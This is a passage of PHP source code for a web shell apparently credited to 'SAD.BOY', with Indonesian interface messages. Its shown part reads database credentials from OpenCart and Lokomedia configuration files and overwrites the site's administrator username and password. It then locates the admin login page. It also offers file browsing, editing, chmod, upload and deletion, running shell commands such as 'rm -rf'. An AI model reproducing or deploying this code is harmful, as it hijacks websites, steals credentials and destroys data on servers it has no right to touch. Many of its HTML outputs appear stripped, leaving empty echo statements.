Status => ".mysql_error()."";
} else {
echo "
Status => sukses, silakan login dengan user & pass yang baru.";
}
mysql_close($conn);
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
$dbname = ambilkata($config,"'DB_DATABASE', '","'");
$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
$prefix = $dbprefix."user";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$target = ambilkata($config,"HTTP_SERVER', '","'");
if($target == '') {
$url_target = "
Login => ERROR, Gagal Mengambil Domain";
} else {
$url_target = "
Login => $target";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "
Config => ".$file_conf."";
echo "
CMS => OpenCart";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "
Status => ".mysql_error()."";
} else {
echo "
Status => sukses, silakan login dengan user & pass yang baru.";
}
mysql_close($conn);
} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
$dbhost = ambilkata($config,'server = "','"');
$dbuser = ambilkata($config,'username = "','"');
$dbpass = ambilkata($config,'password = "','"');
$dbname = ambilkata($config,'database = "','"');
$prefix = "users";
$option = "identitas";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
$result = mysql_fetch_array($q);
$target = $result[alamat_website];
if($target == '') {
$target2 = $result[url];
$url_target = "
Login => ERROR, Gagal Mengambil Domain";
if($target2 == '') {
$url_target2 = "
Login => ERROR, Gagal Memgambil Domain";
} else {
$cek_login3 = file_get_contents("$target2/adminweb/");
$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
$url_target2 = "
Login => $target2/adminweb";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
$url_target2 = "
Login => $target2/lokomedia/adminweb";
} else {
$url_target2 = "
Login => $target2 [ Login Page Admin Tidak Dapat Ditemukan ]";
}
}
} else {
$cek_login = file_get_contents("$target/adminweb/");
$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
$url_target = "
Login => $target/adminweb";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
$url_target = "
Login => $target/lokomedia/adminweb";
} else {
$url_target = "
Login => $target [ Login Page Admin Tidak Dapat Ditemukan ]";
}
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
echo "
Config => ".$file_conf."";
echo "
CMS => Lokomedia";
if(preg_match('/ERROR, Gagal Mengambil Domain/', $url_target)) {
echo $url_target2;
} else {
echo $url_target;
}
if(!$update OR !$conn OR !$db) {
echo "
Status => ".mysql_error()."";
} else {
echo "
Status => Sukses, silakan login dengan user & pass yang baru.";
}
mysql_close($conn);
}
}
}
} else {
echo "
";
}
/*Extract File Zip*/
} elseif($_GET['zip'] == 'extract'){
echo '';
/*upload file: multiple uploader*/
} elseif ($_GET['upl'] == 'upload') {
echo '';
/*view code files*/
} elseif($_GET['demo'] == 'view'){
$filex = $action.'/'.basename($_GET['file']);
$view_file = str_replace($_SERVER['DOCUMENT_ROOT'], '', $action.'/'.basename($_GET['file']));
$ext = strtolower(pathinfo($filex, PATHINFO_EXTENSION));
$lihatF = htmlspecialchars(file_get_contents($filex));
if($ext == "jpg" OR $ext == "bmp" OR $ext == "svg" OR $ext == "tga" OR $ext == "pic" OR $ext == "pxr" OR $ext == "sct" OR $ext == "ccit" OR $ext == "dcs" OR $ext == "iff" OR $ext == "lzw" OR $ext == "rle" OR $ext == "wbmp" OR $ext == "tiff" OR $ext == "ico" OR $ext == "psd" OR $ext == "ttf" OR $ext == "otf" OR $ext == "eps" OR $ext == "tif" OR $ext == "pcx" OR $ext == "png" OR $ext == "jpeg" OR $ext == "gif" OR $ext == "rdw" OR $ext == "ico" OR $ext == "fla" OR $ext == "pdf" OR $ext == "mp3" OR $ext == "mp4" OR $ext == "apk" OR $ext == "zip" OR $ext == "bz2" OR $ext == "lz4" OR $ext == "xz" OR $ext == "7z" OR $ext == "rar" OR $ext == "tar" OR $ext == "gz"){
echo '';
echo '
This File Can\'t Be Read!
';
echo 'This file type may be in the form of images and audio and video and can be in the form of a zip file';
echo '';
} else {
if($lihatF){
echo '';
}
}
/*edit file*/
} elseif($_GET['settings'] == 'edit'){
echo '';
/*rename dir*/
} elseif($_GET['settings'] == 'ubah_folder'){
echo '';
/*rename file*/
} elseif($_GET['settings'] == 'rename'){
echo '';
/*chmod file*/
} elseif($_GET['settings'] == 'chmod_file'){
echo '';
/*chmod dir*/
} elseif($_GET['settings'] == 'chmod_dir'){
echo '';
/*delete dir*/
} elseif($_GET['settings'] == 'hapus_folder'){
if(is_dir($action)){
if(is_writable($action)) {
@rmdir($action);
@exe("rm -rf $action");
@exe("rmdir /s /q $action");
echo '';
} else {
echo ''.basename($action).' Gagal Di-hapus';
}
}
/*delete file*/
} elseif($_GET['settings'] == 'Delete'){
if(unlink($_GET['file'])){
$selesai = $action;
echo '';
} else {
echo ''.basename($_GET['file']).' Gagal Di-hapus';
}
} else {
if(is_dir($action) === true) {
if(!is_readable($action)) {
echo '';
echo '
Can\'t Open The Directory!
';
echo 'Sorry, you can\'t see the contents of the files in this Directory';
echo '';
} else {
echo '
File Name |
Size |
Modified |
Permission |
Option |
';
/*parent directory*/
echo "
Parent Directory |
";
/*scandir: folder*/
$scandir = scandir($action);
foreach($scandir as $folder){
if(!is_dir("$action/$folder") || $folder == '.' || $folder == '..') continue;
$dirtime = date("F d Y g:i:s", filemtime("$action/$folder"));
$view_url_folder = str_replace($_SERVER['DOCUMENT_ROOT'], '', $action.'/'.$folder.'/');
echo '
';
echo 'Copyright © 2020 - SAD.BOY';
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>